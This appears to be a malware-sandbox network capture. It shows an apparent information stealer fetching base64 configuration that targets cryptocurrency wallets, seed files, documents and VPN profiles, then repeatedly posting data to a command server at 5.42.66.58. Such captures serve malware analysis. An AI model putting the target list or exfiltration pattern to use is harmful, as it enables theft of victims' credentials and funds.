6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 47 46 7a 63 33 42 6f 63 6d 46 7a 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 32 56 6c 5a 43 35 7a 5a 57 4e 76 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 78 63 52 57 78 6c 59 33 52 79 62 32 35 44 59 58 4e 6f 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 31 31 62 48 52 70 52 47 39 6e 5a 58 78 63 54 58 56 73 64 47 6c 45 62 32 64 6c 58 48 78 74 64 57 78 30 61 57 52 76 5a 32 55 75 64 32 46 73 62 47 56 30 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 49 43 68 76 62 47 51 70 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 46 4e 30 62 33 4a 68 5a 32 56 63 66 47 5a 70 62 47 56 66 58 7a 41 75 62 47 39 6a 59 57 78 7a 64 47 39 79 59 57 64 6c 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 66 46 78 6a 62 32 30 75 62 47 6c 69 5a 58 4a 30 65 53 35 71 59 58 68 34 58 45 6c 75 5a 47 56 34 5a 57 52 45 51 6c 78 6d 61 57 Data Ascii: Qml0Y29pbiBDb3JlfFxCaXRjb2luXHdhbGxldHNcfHdhbGxldC5kYXR8MXxCaXRjb2luIENvcmUgT2xkfFxCaXRjb2luXHwqd2FsbGV0Ki5kYXR8MHxEb2dlY29pbnxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8XFJhdmVuXHwqd2FsbGV0Ki5kYXR8MHxEYWVkYWx1cyBNYWlubmV0fFxEYWVkYWx1cyBNYWlubmV0XHdhbGxldHNcfHNoZSouc3FsaXRlfDB8QmxvY2tzdHJlYW0gR3JlZW58XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8XFdhbGxldFdhc2FiaVxDbGllbnRcV2FsbGV0c1x8Ki5qc29ufDB8RXRoZXJldW18XEV0aGVyZXVtXHxrZXlzdG9yZXwwfEVsZWN0cnVtfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3xcRWxlY3RydW0tTFRDXHdhbGxldHNcfCouKnwwfEV4b2R1c3xcRXhvZHVzXHxleG9kdXMuY29uZi5qc29ufDB8RXhvZHVzfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8cGFzc3BocmFzZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8c2VlZC5zZWNvfDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHxcRWxlY3Ryb25DYXNoXHdhbGxldHNcfCouKnwwfE11bHRpRG9nZXxcTXVsdGlEb2dlXHxtdWx0aWRvZ2Uud2FsbGV0fDB8SmF4eCBEZXNrdG9wIChvbGQpfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfFxjb20ubGliZXJ0eS5qYXh4XEluZGV4ZWREQlxmaW
Dec 27, 2023 17:58:24.554431915 CET	462	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGC Host: 5.42.66.58 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 2d 2d 0d 0a Data Ascii: ------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="message"files------FIIJJKKFHIEHJKECGCGC--
Dec 27, 2023 17:58:24.944112062 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU
Dec 27, 2023 17:58:26.416358948 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEG Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:27.109657049 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:27.203715086 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:27.827204943 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:27.859246969 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:28.504070044 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:28.574085951 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:29.414122105 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:29.634322882 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:30.381529093 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:30.616166115 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJ Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:31.583564043 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:31.632121086 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAK Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:32.318846941 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:32.707947969 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKF Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:33.446634054 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:33.582269907 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCA Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:34.339169979 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:34.458342075 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:35.191163063 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:35.314105034 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKK Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:35.940968037 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:36.688483000 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:37.419377089 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:37.613185883 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:38.505445957 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:38.618060112 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEB Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:39.307327032 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:39.419359922 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:40.090790987 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:40.187980890 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:40.982131004 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:41.540045977 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHC Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:42.236479044 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:42.274416924 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:42.906232119 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:43.027760983 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKEBGCGHIDHCBFHIDGH Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:43.587718010 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:43.654793978 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJ Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:44.324965000 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:44.403296947 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:45.051055908 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:45.155971050 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:45.802026033 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:45.859411001 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKK Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:46.538970947 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:46.565164089 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:47.272037029 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:47.407799006 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJ Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:48.074254990 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:48.153351068 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHID Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:48.810085058 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:48.855283022 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:49.570946932 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:49.677735090 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDH Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:50.304500103 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:50.420655012 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDBAFHJJDAKEBGCFCBG Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:51.223844051 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:51.261816978 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJ Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:51.935514927 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:52.202107906 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHID Host: 5.42.66.58 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:52.846239090 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:53.087641001 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJ Host: 5.42.66.58 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
